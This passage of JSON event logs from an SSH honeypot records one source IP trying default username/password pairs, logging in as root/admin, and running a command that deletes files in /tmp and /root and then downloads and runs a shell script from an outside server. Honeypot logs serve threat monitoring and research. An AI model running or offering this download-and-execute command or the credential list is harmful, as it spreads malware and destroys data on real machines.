SH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.806822Z","src_ip":"87.120.191.13","session":"ea7bf6d8b587"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.829561Z","src_ip":"87.120.191.13","session":"86281a71e86e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.830854Z","src_ip":"87.120.191.13","session":"86281a71e86e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.832384Z","src_ip":"87.120.191.13","session":"5419a5234ad0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.832953Z","src_ip":"87.120.191.13","session":"5419a5234ad0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.834061Z","src_ip":"87.120.191.13","session":"ffda43c172a0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.834465Z","src_ip":"87.120.191.13","session":"ffda43c172a0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.837236Z","src_ip":"87.120.191.13","session":"3c20fca3d27e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.838066Z","src_ip":"87.120.191.13","session":"3c20fca3d27e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.840322Z","src_ip":"87.120.191.13","session":"6ac7ed57c0c6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.840779Z","src_ip":"87.120.191.13","session":"6ac7ed57c0c6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.842023Z","src_ip":"87.120.191.13","session":"e4672669f387"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.843115Z","src_ip":"87.120.191.13","session":"e4672669f387"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.844487Z","src_ip":"87.120.191.13","session":"43571887d3d7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.845122Z","src_ip":"87.120.191.13","session":"43571887d3d7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.121283Z","src_ip":"87.120.191.13","session":"ea7bf6d8b587"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.162023Z","src_ip":"87.120.191.13","session":"6ac7ed57c0c6"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.194497Z","src_ip":"87.120.191.13","session":"5419a5234ad0"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.212916Z","src_ip":"87.120.191.13","session":"86281a71e86e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.216974Z","src_ip":"87.120.191.13","session":"43571887d3d7"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin","message":"login attempt [student/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.238928Z","src_ip":"87.120.191.13","session":"3c20fca3d27e"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.244331Z","src_ip":"87.120.191.13","session":"e4672669f387"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.263704Z","src_ip":"87.120.191.13","session":"ffda43c172a0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40536,"dst_ip":"1.2.3.4","dst_port":22,"session":"2188e401ab01","protocol":"ssh","message":"New connection: 87.120.191.13:40536 (1.2.3.4:22) [session: 2188e401ab01]","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.303452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.371535Z","src_ip":"87.120.191.13","session":"2188e401ab01"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.372257Z","src_ip":"87.120.191.13","session":"2188e401ab01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:58:29.397202Z","src_ip":"87.120.191.13","session":"5419a5234ad0"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.397947Z","src_ip":"87.120.191.13","session":"5419a5234ad0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.521295Z","src_ip":"87.120.191.13","session":"5419a5234ad0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.522437Z","src_ip":"87.120.191.13","session":"5419a5234ad0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40550,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b58abb2a8af","protocol":"ssh","message":"New connection: 87.120.191.13:40550 (1.2.3.4:22) [session: 6b58abb2a8af]","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.553996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.641089Z","src_ip":"87.120.191.13","session":"6b58abb2a8af"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.642586Z","src_ip":"87.120.191.13","session":"6b58abb2a8af"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:58:29.701246Z","src_ip":"87.120.191.13","session":"2188e401ab01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:58:30.047495Z","src_ip":"87.120.191.13","session":"2188e401ab01"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.048555Z","src_ip":"87.120.191.13","session":"2188e401ab01"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.183654Z","src_ip":"87.120.191.13","session":"6b58abb2a8af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.188096Z","src_ip":"87.120.191.13","session":"2188e401ab01"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.236392Z","src_ip":"87.120.191.13","session":"ea7bf6d8b587"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40582,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae69a46ab953","protocol":"ssh","message":"New connection: 87.120.191.13:40582 (1.2.3.4:22) [session: ae69a46ab953]","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.261695Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.285367Z","src_ip":"87.120.191.13","session":"6ac7ed57c0c6"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40592,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb224bc80c4c","protocol":"ssh","message":"New connection: 87.120.191.13:40592 (1.2.3.4:22) [session: bb224bc80c4c]","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.306739Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.315654Z","src_ip":"87.120.191.13","session":"2188e401ab01"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.324301Z","src_ip":"87.120.191.13","session":"43571887d3d7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.331825Z","src_ip":"87.120.191.13","session":"86281a71e86e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.339221Z","src_ip":"87.120.191.13","session":"3c20fca3d27e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.344282Z","src_ip":"87.120.191.13","session":"ae69a46ab953"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.345025Z","src_ip":"87.120.191.13","session":"ae69a46ab953"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40596,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f75dfff6011","protocol":"ssh","message":"New connection: 87.120.191.13:40596 (1.2.3.4:22) [session: 6f75dfff6011]","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.354653Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.356824Z","src_ip":"87.120.191.13","session":"e4672669f387"}
